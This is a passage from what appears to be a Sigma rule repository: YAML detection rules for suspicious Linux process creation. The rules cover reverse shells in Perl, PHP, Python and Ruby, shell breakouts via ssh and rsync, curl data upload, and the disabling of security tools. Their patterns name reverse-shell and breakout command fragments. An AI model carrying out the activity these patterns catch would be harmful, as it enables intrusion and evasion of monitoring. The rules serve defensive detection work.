- https://www.computerhope.com/unix/unohup.htm
author: 'Christopher Peacock @SecurePeacock, SCYTHE @scythe_io'
date: 2022-06-06
tags:
- attack.execution
- attack.t1059.004
logsource:
product: linux
category: process_creation
detection:
selection:
Image|endswith: '/nohup'
condition: selection
falsepositives:
- Administrators or installed processes that leverage nohup
level: medium
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_nohup_susp_execution.yml
================================================
title: Suspicious Nohup Execution
id: 457df417-8b9d-4912-85f3-9dbda39c3645
related:
- id: e4ffe466-6ff8-48d4-94bd-e32d1a6061e2
type: derived
status: test
description: Detects execution of binaries located in potentially suspicious locations via "nohup"
references:
- https://blogs.jpcert.or.jp/en/2023/05/gobrat.html
- https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/
- https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection
- https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection
author: Joseliyo Sanchez, @Joseliyo_Jstnk
date: 2023-06-02
tags:
- attack.execution
logsource:
product: linux
category: process_creation
detection:
selection:
Image|endswith: '/nohup'
CommandLine|contains: '/tmp/'
condition: selection
falsepositives:
- Unknown
level: high
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_omigod_scx_runasprovider_executescript.yml
================================================
title: OMIGOD SCX RunAsProvider ExecuteScript
id: 6eea1bf6-f8d2-488a-a742-e6ef6c1b67db
status: test
description: |
Rule to detect the use of the SCX RunAsProvider ExecuteScript to execute any UNIX/Linux script using the /bin/sh shell.
Script being executed gets created as a temp file in /tmp folder with a scx* prefix.
Then it is invoked from the following directory /etc/opt/microsoft/scx/conf/tmpdir/.
The file in that directory has the same prefix scx*. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including
Microsoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.
references:
- https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure
- https://github.com/Azure/Azure-Sentinel/pull/3059
author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC
date: 2021-10-15
modified: 2022-10-05
tags:
- attack.privilege-escalation
- attack.initial-access
- attack.execution
- attack.t1068
- attack.t1190
- attack.t1203
logsource:
product: linux
category: process_creation
detection:
selection:
User: root
LogonId: 0
CurrentDirectory: '/var/opt/microsoft/scx/tmp'
CommandLine|contains: '/etc/opt/microsoft/scx/conf/tmpdir/scx'
condition: selection
falsepositives:
- Legitimate use of SCX RunAsProvider ExecuteScript.
level: high
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_omigod_scx_runasprovider_executeshellcommand.yml
================================================
title: OMIGOD SCX RunAsProvider ExecuteShellCommand
id: 21541900-27a9-4454-9c4c-3f0a4240344a
status: test
description: |
Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell.
SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including
Microsoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.
references:
- https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure
- https://github.com/Azure/Azure-Sentinel/pull/3059
author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC
date: 2021-10-15
modified: 2022-10-05
tags:
- attack.privilege-escalation
- attack.initial-access
- attack.execution
- attack.t1068
- attack.t1190
- attack.t1203
logsource:
product: linux
category: process_creation
detection:
selection:
User: root
LogonId: 0
CurrentDirectory: '/var/opt/microsoft/scx/tmp'
CommandLine|contains: '/bin/sh'
condition: selection
falsepositives:
- Legitimate use of SCX RunAsProvider Invoke_ExecuteShellCommand.
level: high
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_perl_reverse_shell.yml
================================================
title: Potential Perl Reverse Shell Execution
id: 259df6bc-003f-4306-9f54-4ff1a08fa38e
status: test
description: Detects execution of the perl binary with the "-e" flag and common strings related to potential reverse shell activity
references:
- https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
- https://www.revshells.com/
author: '@d4ns4n_, Nasreddine Bencherchali (Nextron Systems)'
date: 2023-04-07
tags:
- attack.execution
logsource:
category: process_creation
product: linux
detection:
selection_img:
Image|endswith: '/perl'
CommandLine|contains: ' -e '
selection_content:
- CommandLine|contains|all:
- 'fdopen('
- '::Socket::INET'
- CommandLine|contains|all:
- 'Socket'
- 'connect'
- 'open'
- 'exec'
condition: all of selection_*
falsepositives:
- Unlikely
level: high
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_php_reverse_shell.yml
================================================
title: Potential PHP Reverse Shell
id: c6714a24-d7d5-4283-a36b-3ffd091d5f7e
status: test
description: |
Detects usage of the PHP CLI with the "-r" flag which allows it to run inline PHP code. The rule looks for calls to the "fsockopen" function which allows the creation of sockets.
Attackers often leverage this in combination with functions such as "exec" or "fopen" to initiate a reverse shell connection.
references:
- https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
- https://www.revshells.com/
author: '@d4ns4n_'
date: 2023-04-07
tags:
- attack.execution
logsource:
category: process_creation
product: linux
detection:
selection:
Image|contains: '/php'
CommandLine|contains|all:
- ' -r '
- 'fsockopen'
CommandLine|contains:
- 'ash'
- 'bash'
- 'bsh'
- 'csh'
- 'ksh'
- 'pdksh'
- 'sh'
- 'tcsh'
- 'zsh'
condition: selection
falsepositives:
- Unknown
level: high
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_pnscan_binary_cli_pattern.yml
================================================
title: Pnscan Binary Data Transmission Activity
id: 97de11cd-4b67-4abf-9a8b-1020e670aa9e
status: test
description: |
Detects command line patterns associated with the use of Pnscan for sending and receiving binary data across the network.
This behavior has been identified in a Linux malware campaign targeting Docker, Apache Hadoop, Redis, and Confluence and was previously used by the threat actor known as TeamTNT
author: David Burkett (@signalblur)
date: 2024-04-16
references:
- https://www.cadosecurity.com/blog/spinning-yarn-a-new-linux-malware-campaign-targets-docker-apache-hadoop-redis-and-confluence
- https://intezer.com/wp-content/uploads/2021/09/TeamTNT-Cryptomining-Explosion.pdf
- https://regex101.com/r/RugQYK/1
- https://www.virustotal.com/gui/file/beddf70a7bab805f0c0b69ac0989db6755949f9f68525c08cb874988353f78a9/content
tags:
- attack.discovery
- attack.t1046
logsource:
category: process_creation
product: linux
detection:
selection:
CommandLine|re: -(W|R)\s?(\s|"|')([0-9a-fA-F]{2}\s?){2,20}(\s|"|')
condition: selection
falsepositives:
- Unknown
level: medium
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_proxy_connection.yml
================================================
title: Connection Proxy
id: 72f4ab3f-787d-495d-a55d-68c2ff46cf4c
status: test
description: Detects setting proxy configuration
author: Ömer Günal
date: 2020-06-17
modified: 2022-10-05
tags:
- attack.defense-evasion
- attack.command-and-control
- attack.t1090
logsource:
product: linux
category: process_creation
detection:
selection:
CommandLine|contains:
- 'http_proxy='
- 'https_proxy='
condition: selection
falsepositives:
- Legitimate administration activities
level: low
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_pua_trufflehog.yml
================================================
title: PUA - TruffleHog Execution - Linux
id: d7a650c4-226c-451e-948f-cc490db506aa
related:
- id: 44030449-b0df-4c94-aae1-502359ab28ee
type: similar
status: experimental
description: |
Detects execution of TruffleHog, a tool used to search for secrets in different platforms like Git, Jira, Slack, SharePoint, etc. that could be used maliciously.
While it is a legitimate tool, intended for use in CI pipelines and security assessments,
It was observed in the Shai-Hulud malware campaign targeting npm packages to steal sensitive information.
references:
- https://github.com/trufflesecurity/trufflehog
- https://www.getsafety.com/blog-posts/shai-hulud-npm-attack
author: Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2025-09-24
tags:
- attack.discovery
- attack.credential-access
- attack.t1083
- attack.t1552.001
logsource:
category: process_creation
product: linux
detection:
selection_img:
Image|endswith: '/trufflehog'
selection_cli_platform:
CommandLine|contains:
- ' docker --image '
- ' Git '
- ' GitHub '
- ' Jira '
- ' Slack '
- ' Confluence '
- ' SharePoint '
- ' s3 '
- ' gcs '
selection_cli_verified:
CommandLine|contains: ' --results=verified'
condition: selection_img or all of selection_cli_*
falsepositives:
- Legitimate use of TruffleHog by security teams or developers.
level: medium
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_python_http_server_execution.yml
================================================
title: Python WebServer Execution - Linux
id: 3f0f5957-04f8-4792-ad89-192b0303bde6
status: experimental
description: |
Detects the execution of Python web servers via command line interface (CLI).
After gaining access to target systems, adversaries may use Python's built-in HTTP server modules to quickly establish a web server without requiring additional software.
This technique is commonly used in post-exploitation scenarios as it provides a simple method for transferring files between the compromised host and attacker-controlled systems.
references:
- https://www.atomicredteam.io/atomic-red-team/atomics/T1048.003#atomic-test-8---python3-httpserver
- https://docs.python.org/3/library/http.server.html
- https://docs.python.org/2/library/simplehttpserver.html
author: Mohamed LAKRI
date: 2025-10-17
tags:
- attack.exfiltration
- attack.t1048.003
logsource:
product: linux
category: process_creation
detection:
selection_img:
- Image|endswith:
- '/python'
- '/python2'
- '/python3'
- Image|contains:
- '/python2.' # python image is always of the form ../python3.10; ../python is just a symlink
- '/python3.'
selection_module:
CommandLine|contains:
- 'http.server'
- 'SimpleHTTPServer'
condition: all of selection_*
falsepositives:
- Testing or development activity
level: medium
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_python_pty_spawn.yml
================================================
title: Python Spawning Pretty TTY Via PTY Module
id: c4042d54-110d-45dd-a0e1-05c47822c937
related:
- id: 32e62bc7-3de0-4bb1-90af-532978fe42c0
type: similar
status: test
description: |
Detects a python process calling to the PTY module in order to spawn a pretty tty which could be indicative of potential reverse shell activity.
references:
- https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/
author: Nextron Systems
date: 2022-06-03
modified: 2024-11-04
tags:
- attack.execution
- attack.t1059
logsource:
category: process_creation
product: linux
detection:
selection_img:
- Image|endswith:
- '/python'
- '/python2'
- '/python3'
- Image|contains:
- '/python2.' # python image is always of the form ../python3.10; ../python is just a symlink
- '/python3.'
selection_cli_import:
CommandLine|contains:
- 'import pty'
- 'from pty '
selection_cli_spawn:
CommandLine|contains: 'spawn'
condition: all of selection_*
falsepositives:
- Unknown
level: medium
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_python_reverse_shell.yml
================================================
title: Python Reverse Shell Execution Via PTY And Socket Modules
id: 32e62bc7-3de0-4bb1-90af-532978fe42c0
related:
- id: c4042d54-110d-45dd-a0e1-05c47822c937
type: similar
status: test
description: |
Detects the execution of python with calls to the socket and pty module in order to connect and spawn a potential reverse shell.
references:
- https://www.revshells.com/
author: '@d4ns4n_, Nasreddine Bencherchali (Nextron Systems)'
date: 2023-04-24
modified: 2024-11-04
tags:
- attack.execution
logsource:
category: process_creation
product: linux
detection:
selection:
Image|contains: 'python'
CommandLine|contains|all:
- ' -c '
- 'import'
- 'pty'
- 'socket'
- 'spawn'
- '.connect'
condition: selection
falsepositives:
- Unknown
level: high
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_python_shell_os_system.yml
================================================
title: Inline Python Execution - Spawn Shell Via OS System Library
id: 2d2f44ff-4611-4778-a8fc-323a0e9850cc
status: test
description: |
Detects execution of inline Python code via the "-c" in order to call the "system" function from the "os" library, and spawn a shell.
references:
- https://gtfobins.github.io/gtfobins/python/#shell
author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)
date: 2024-09-02
tags:
- attack.execution
- attack.t1059
logsource:
category: process_creation
product: linux
detection:
selection_img:
- Image|endswith:
- '/python'
- '/python2'
- '/python3'
- Image|contains:
- '/python2.' # python image is always of the form ../python3.10; ../python is just a symlink
- '/python3.'
selection_cli:
CommandLine|contains|all:
- ' -c '
- 'os.system('
CommandLine|contains:
- '/bin/bash'
- '/bin/dash'
- '/bin/fish'
- '/bin/sh'
- '/bin/zsh'
condition: all of selection_*
falsepositives:
- Unknown
level: high
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_remote_access_tools_teamviewer_incoming_connection.yml
================================================
title: Remote Access Tool - Team Viewer Session Started On Linux Host
id: 1f6b8cd4-3e60-47cc-b282-5aa1cbc9182d
related:
- id: ab70c354-d9ac-4e11-bbb6-ec8e3b153357
type: similar
- id: f459ccb4-9805-41ea-b5b2-55e279e2424a
type: similar
status: test
description: |
Detects the command line executed when TeamViewer starts a session started by a remote host.
Once a connection has been started, an investigator can verify the connection details by viewing the "incoming_connections.txt" log file in the TeamViewer folder.
references:
- Internal Research
author: Josh Nickels, Qi Nan
date: 2024-03-11
tags:
- attack.persistence
- attack.initial-access
- attack.t1133
logsource:
category: process_creation
product: linux
detection:
selection:
ParentImage|endswith: '/TeamViewer_Service'
Image|endswith: '/TeamViewer_Desktop'
CommandLine|endswith: '/TeamViewer_Desktop --IPCport 5939 --Module 1'
condition: selection
falsepositives:
- Legitimate usage of TeamViewer
level: low
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_remote_system_discovery.yml
================================================
title: Linux Remote System Discovery
id: 11063ec2-de63-4153-935e-b1a8b9e616f1
status: test
description: Detects the enumeration of other remote systems.
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md
author: Alejandro Ortuno, oscd.community
date: 2020-10-22
modified: 2021-11-27
tags:
- attack.discovery
- attack.t1018
logsource:
category: process_creation
product: linux
detection:
selection_1:
Image|endswith: '/arp'
CommandLine|contains: '-a'
selection_2:
Image|endswith: '/ping'
CommandLine|contains:
- ' 10.' # 10.0.0.0/8
- ' 192.168.' # 192.168.0.0/16
- ' 172.16.' # 172.16.0.0/12
- ' 172.17.'
- ' 172.18.'
- ' 172.19.'
- ' 172.20.'
- ' 172.21.'
- ' 172.22.'
- ' 172.23.'
- ' 172.24.'
- ' 172.25.'
- ' 172.26.'
- ' 172.27.'
- ' 172.28.'
- ' 172.29.'
- ' 172.30.'
- ' 172.31.'
- ' 127.' # 127.0.0.0/8
- ' 169.254.' # 169.254.0.0/16
condition: 1 of selection*
falsepositives:
- Legitimate administration activities
level: low
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_remove_package.yml
================================================
title: Linux Package Uninstall
id: 95d61234-7f56-465c-6f2d-b562c6fedbc4
status: test
description: Detects linux package removal using builtin tools such as "yum", "apt", "apt-get" or "dpkg".
references:
- https://sysdig.com/blog/mitre-defense-evasion-falco
- https://www.tutorialspoint.com/how-to-install-a-software-on-linux-using-yum-command
- https://linuxhint.com/uninstall_yum_package/
- https://linuxhint.com/uninstall-debian-packages/
author: Tuan Le (NCSGroup), Nasreddine Bencherchali (Nextron Systems)
date: 2023-03-09
tags:
- attack.defense-evasion
- attack.t1070
logsource:
product: linux
category: process_creation
detection:
selection_yum:
Image|endswith: '/yum'
CommandLine|contains:
- 'erase'
- 'remove'
selection_apt:
Image|endswith:
- '/apt'
- '/apt-get'
CommandLine|contains:
- 'remove'
- 'purge'
selection_dpkg:
Image|endswith: '/dpkg'
CommandLine|contains:
- '--remove '
- ' -r '
selection_rpm:
Image|endswith: '/rpm'
CommandLine|contains: ' -e '
condition: 1 of selection_*
falsepositives:
- Administrator or administrator scripts might delete packages for several reasons (debugging, troubleshooting).
level: low
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_rsync_shell_execution.yml
================================================
title: Shell Execution via Rsync - Linux
id: e2326866-609f-4015-aea9-7ec634e8aa04
status: experimental
description: |
Detects the use of the "rsync" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
references:
- https://gtfobins.github.io/gtfobins/rsync/#shell
author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.), Florian Roth
date: 2024-09-02
modified: 2025-01-18
tags:
- attack.execution
- attack.t1059
logsource:
category: process_creation
product: linux
detection:
selection_img:
Image|endswith:
- '/rsync'
- '/rsyncd'
CommandLine|contains: ' -e '
selection_cli:
CommandLine|contains:
- '/ash '
- '/bash '
- '/dash '
- '/csh '
- '/sh '
- '/zsh '
- '/tcsh '
- '/ksh '
- "'ash "
- "'bash "
- "'dash "
- "'csh "
- "'sh "
- "'zsh "
- "'tcsh "
- "'ksh "
condition: all of selection_*
falsepositives:
- Legitimate cases in which "rsync" is used to execute a shell
level: high
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_rsync_shell_spawn.yml
================================================
title: Suspicious Invocation of Shell via Rsync
id: 297241f3-8108-4b3a-8c15-2dda9f844594
status: experimental
description: |
Detects the execution of a shell as sub process of "rsync" without the expected command line flag "-e" being used, which could be an indication of exploitation as described in CVE-2024-12084. This behavior is commonly associated with attempts to execute arbitrary commands or escalate privileges, potentially leading to unauthorized access or further exploitation.
references:
- https://sysdig.com/blog/detecting-and-mitigating-cve-2024-12084-rsync-remote-code-execution/
- https://gist.github.com/Neo23x0/a20436375a1e26524931dd8ea1a3af10
author: Florian Roth
date: 2025-01-18
tags:
- attack.execution
- attack.t1059
- attack.t1203
logsource:
category: process_creation
product: linux
detection:
selection:
ParentImage|endswith:
- '/rsync'
- '/rsyncd'
Image|endswith:
- '/ash'
- '/bash'
- '/csh'
- '/dash'
- '/ksh'
- '/sh'
- '/tcsh'
- '/zsh'
filter_main_expected:
CommandLine|contains: ' -e '
condition: selection and not 1 of filter_main_*
falsepositives:
- Unknown
level: high
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_ruby_reverse_shell.yml
================================================
title: Potential Ruby Reverse Shell
id: b8bdac18-c06e-4016-ac30-221553e74f59
status: test
description: Detects execution of ruby with the "-e" flag and calls to "socket" related functions. This could be an indication of a potential attempt to setup a reverse shell
references:
- https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
- https://www.revshells.com/
author: '@d4ns4n_'
date: 2023-04-07
tags:
- attack.execution
logsource:
category: process_creation
product: linux
detection:
selection:
Image|contains: 'ruby'
CommandLine|contains|all:
- ' -e'
- 'rsocket'
- 'TCPSocket'
CommandLine|contains:
- ' ash'
- ' bash'
- ' bsh'
- ' csh'
- ' ksh'
- ' pdksh'
- ' sh'
- ' tcsh'
condition: selection
falsepositives:
- Unknown
level: medium
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_schedule_task_job_cron.yml
================================================
title: Scheduled Cron Task/Job - Linux
id: 6b14bac8-3e3a-4324-8109-42f0546a347f
status: test
description: Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder.
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.003/T1053.003.md
author: Alejandro Ortuno, oscd.community
date: 2020-10-06
modified: 2022-11-27
tags:
- attack.execution
- attack.persistence
- attack.privilege-escalation
- attack.t1053.003
logsource:
category: process_creation
product: linux
detection:
selection:
Image|endswith: 'crontab'
CommandLine|contains: '/tmp/'
condition: selection
falsepositives:
- Legitimate administration activities
level: medium
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_security_software_discovery.yml
================================================
title: Security Software Discovery - Linux
id: c9d8b7fd-78e4-44fe-88f6-599135d46d60
status: test
description: Detects usage of system utilities (only grep and egrep for now) to discover security software discovery
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md
author: Daniil Yugoslavskiy, oscd.community
date: 2020-10-19
modified: 2022-11-27
tags:
- attack.discovery
- attack.t1518.001
logsource:
category: process_creation
product: linux
detection:
selection:
Image|endswith:
# You can add more grep variations such as fgrep, rgrep...etc
- '/grep'
- '/egrep'
CommandLine|contains:
- 'nessusd' # nessus vulnerability scanner
- 'td-agent' # fluentd log shipper
- 'packetbeat' # elastic network logger/shipper
- 'filebeat' # elastic log file shipper
- 'auditbeat' # elastic auditing agent/log shipper
- 'osqueryd' # facebook osquery
- 'cbagentd' # carbon black
- 'falcond' # crowdstrike falcon
condition: selection
falsepositives:
- Legitimate activities
level: low
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_security_tools_disabling.yml
================================================
title: Disabling Security Tools
id: e3a8a052-111f-4606-9aee-f28ebeb76776
status: test
description: Detects disabling security tools
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md
author: Ömer Günal, Alejandro Ortuno, oscd.community
date: 2020-06-17
modified: 2022-10-09
tags:
- attack.defense-evasion
- attack.t1562.004
logsource:
category: process_creation
product: linux
detection:
selection_iptables_1:
Image|endswith: '/service'
CommandLine|contains|all:
- 'iptables'
- 'stop'
selection_iptables_2:
Image|endswith: '/service'
CommandLine|contains|all:
- 'ip6tables'
- 'stop'
selection_iptables_3:
Image|endswith: '/chkconfig'
CommandLine|contains|all:
- 'iptables'
- 'stop'
selection_iptables_4:
Image|endswith: '/chkconfig'
CommandLine|contains|all:
- 'ip6tables'
- 'stop'
selection_firewall_1:
Image|endswith: '/systemctl'
CommandLine|contains|all:
- 'firewalld'
- 'stop'
selection_firewall_2:
Image|endswith: '/systemctl'
CommandLine|contains|all:
- 'firewalld'
- 'disable'
selection_carbonblack_1:
Image|endswith: '/service'
CommandLine|contains|all:
- 'cbdaemon'
- 'stop'
selection_carbonblack_2:
Image|endswith: '/chkconfig'
CommandLine|contains|all:
- 'cbdaemon'
- 'off'
selection_carbonblack_3:
Image|endswith: '/systemctl'
CommandLine|contains|all:
- 'cbdaemon'
- 'stop'
selection_carbonblack_4:
Image|endswith: '/systemctl'
CommandLine|contains|all:
- 'cbdaemon'
- 'disable'
selection_selinux:
Image|endswith: '/setenforce'
CommandLine|contains: '0'
selection_crowdstrike_1:
Image|endswith: '/systemctl'
CommandLine|contains|all:
- 'stop'
- 'falcon-sensor'
selection_crowdstrike_2:
Image|endswith: '/systemctl'
CommandLine|contains|all:
- 'disable'
- 'falcon-sensor'
condition: 1 of selection*
falsepositives:
- Legitimate administration activities
level: medium
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_services_stop_and_disable.yml
================================================
title: Disable Or Stop Services
id: de25eeb8-3655-4643-ac3a-b662d3f26b6b
status: test
description: Detects the usage of utilities such as 'systemctl', 'service'...etc to stop or disable tools and services
references:
- https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-09-15
tags:
- attack.defense-evasion
logsource:
category: process_creation
product: linux
detection:
selection:
Image|endswith:
- '/service'
- '/systemctl'
- '/chkconfig'
CommandLine|contains:
- 'stop'
- 'disable'
condition: selection
falsepositives:
- Legitimate administration activities
level: medium
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_setgid_setuid.yml
================================================
title: Setuid and Setgid
id: c21c4eaa-ba2e-419a-92b2-8371703cbe21
status: test
description: Detects suspicious change of file privileges with chown and chmod commands
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.001/T1548.001.md
author: Ömer Günal
date: 2020-06-16
modified: 2022-10-05
tags:
- attack.defense-evasion
- attack.persistence
- attack.privilege-escalation
- attack.t1548.001
logsource:
product: linux
category: process_creation
detection:
selection_root:
CommandLine|contains: 'chown root'
selection_perm:
CommandLine|contains:
- ' chmod u+s'
- ' chmod g+s'
condition: all of selection_*
falsepositives:
- Legitimate administration activities
level: low
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_ssh_shell_execution.yml
================================================
title: Shell Invocation Via Ssh - Linux
id: 8737b7f6-8df3-4bb7-b1da-06019b99b687
status: test
description: |
Detects the use of the "ssh" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
references:
- https://gtfobins.github.io/gtfobins/ssh/
- https://www.elastic.co/guide/en/security/current/linux-restricted-shell-breakout-via-linux-binary-s.html
author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)
date: 2024-08-29
tags:
- attack.execution
- attack.t1059
logsource:
category: process_creation
product: linux
detection:
selection_img:
Image|endswith: '/ssh'
CommandLine|contains:
- 'ProxyCommand=;'
- 'permitlocalcommand=yes'
- 'localhost'
selection_cli:
CommandLine|contains:
- '/bin/bash'
- '/bin/dash'
- '/bin/fish'
- '/bin/sh'
- '/bin/zsh'
- 'sh 0<&2 1>&2'
- 'sh 1>&2 0<&2'
condition: all of selection_*
falsepositives:
- Unknown
level: high
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_ssm_agent_abuse.yml
================================================
title: Potential Linux Amazon SSM Agent Hijacking
id: f9b3edc5-3322-4fc7-8aa3-245d646cc4b7
status: test
description: Detects potential Amazon SSM agent hijack attempts as outlined in the Mitiga research report.
references:
- https://www.mitiga.io/blog/mitiga-security-advisory-abusing-the-ssm-agent-as-a-remote-access-trojan
- https://www.bleepingcomputer.com/news/security/amazons-aws-ssm-agent-can-be-used-as-post-exploitation-rat-malware/
- https://www.helpnetsecurity.com/2023/08/02/aws-instances-attackers-access/
author: Muhammad Faisal
date: 2023-08-03
tags:
- attack.command-and-control
- attack.persistence
- attack.t1219.002
logsource:
category: process_creation
product: linux
detection:
selection:
Image|endswith: '/amazon-ssm-agent'
CommandLine|contains|all:
- '-register '
- '-code '
- '-id '
- '-region '
condition: selection
falsepositives:
- Legitimate activity of system administrators
level: medium
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_susp_chmod_directories.yml
================================================
title: Chmod Suspicious Directory
id: 6419afd1-3742-47a5-a7e6-b50386cd15f8
status: test
description: Detects chmod targeting files in abnormal directory paths.
references:
- https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.002/T1222.002.md
author: 'Christopher Peacock @SecurePeacock, SCYTHE @scythe_io'
date: 2022-06-03
tags:
- attack.defense-evasion
- attack.t1222.002
logsource:
product: linux
category: process_creation
detection:
selection:
Image|endswith: '/chmod'
CommandLine|contains:
- '/tmp/'
- '/.Library/'
- '/etc/'
- '/opt/'
condition: selection
falsepositives:
- Admin changing file permissions.
level: medium
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_susp_container_residence_discovery.yml
================================================
title: Container Residence Discovery Via Proc Virtual FS
id: 746c86fb-ccda-4816-8997-01386263acc4
status: test
description: Detects potential container discovery via listing of certain kernel features in the "/proc" virtual filesystem
references:
- https://blog.skyplabs.net/posts/container-detection/
- https://stackoverflow.com/questions/20010199/how-to-determine-if-a-process-runs-inside-lxc-docker
tags:
- attack.discovery
- attack.t1082
author: Seth Hanford
date: 2023-08-23
logsource:
category: process_creation
product: linux
detection:
selection_tools:
Image|endswith:
- 'awk'
- '/cat'
- 'grep'
- '/head'
- '/less'
- '/more'
- '/nl'
- '/tail'
selection_procfs_kthreadd: # outside containers, PID 2 == kthreadd
CommandLine|contains: '/proc/2/'
selection_procfs_target:
CommandLine|contains: '/proc/'
CommandLine|endswith:
- '/cgroup' # cgroups end in ':/' outside containers
- '/sched' # PID mismatch when run in containers
condition: selection_tools and 1 of selection_procfs_*
falsepositives:
- Legitimate system administrator usage of these commands
- Some container tools or deployments may use these techniques natively to determine how they proceed with execution, and will need to be filtered
level: low
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_susp_curl_fileupload.yml
================================================
title: Suspicious Curl File Upload - Linux
id: 00b90cc1-17ec-402c-96ad-3a8117d7a582
related:
- id: 00bca14a-df4e-4649-9054-3f2aa676bc04
type: derived
status: test
description: Detects a suspicious curl process start the adds a file to a web request
references:
- https://twitter.com/d1r4c/status/1279042657508081664
- https://medium.com/@petehouston/upload-files-with-curl-93064dcccc76
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-19---curl-upload-file
- https://curl.se/docs/manpage.html
- https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html
author: Nasreddine Bencherchali (Nextron Systems), Cedric MAURUGEON (Update)
date: 2022-09-15
modified: 2023-05-02
tags:
- attack.exfiltration
- attack.command-and-control
- attack.t1567
- attack.t1105
logsource:
category: process_creation
product: linux
detection:
selection_img:
Image|endswith: '/curl'
selection_cli:
- CommandLine|contains:
- ' --form' # Also covers the "--form-string"
- ' --upload-file '
- ' --data '
- ' --data-' # For flags like: "--data-ascii", "--data-binary", "--data-raw", "--data-urlencode"
- CommandLine|re: '\s-[FTd]\s' # We use regex to ensure a case sensitive argument detection
filter_optional_localhost:
CommandLine|contains:
- '://localhost'
- '://127.0.0.1'
condition: all of selection_* and not 1 of filter_optional_*
falsepositives:
- Scripts created by developers and admins
level: medium
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_susp_curl_useragent.yml
================================================
title: Suspicious Curl Change User Agents - Linux
id: b86d356d-6093-443d-971c-9b07db583c68
related:
- id: 3286d37a-00fd-41c2-a624-a672dcd34e60
type: derived
status: test
description: Detects a suspicious curl process start on linux with set useragent options
references:
- https://curl.se/docs/manpage.html
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-09-15
tags:
- attack.command-and-control
- attack.t1071.001
logsource:
category: process_creation
product: linux
detection:
selection:
Image|endswith: '/curl'
CommandLine|contains:
- ' -A '
- ' --user-agent '
condition: selection
falsepositives:
- Scripts created by developers and admins
- Administrative activity
level: medium
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_susp_dockerenv_recon.yml
================================================
title: Docker Container Discovery Via Dockerenv Listing
id: 11701de9-d5a5-44aa-8238-84252f131895
status: test
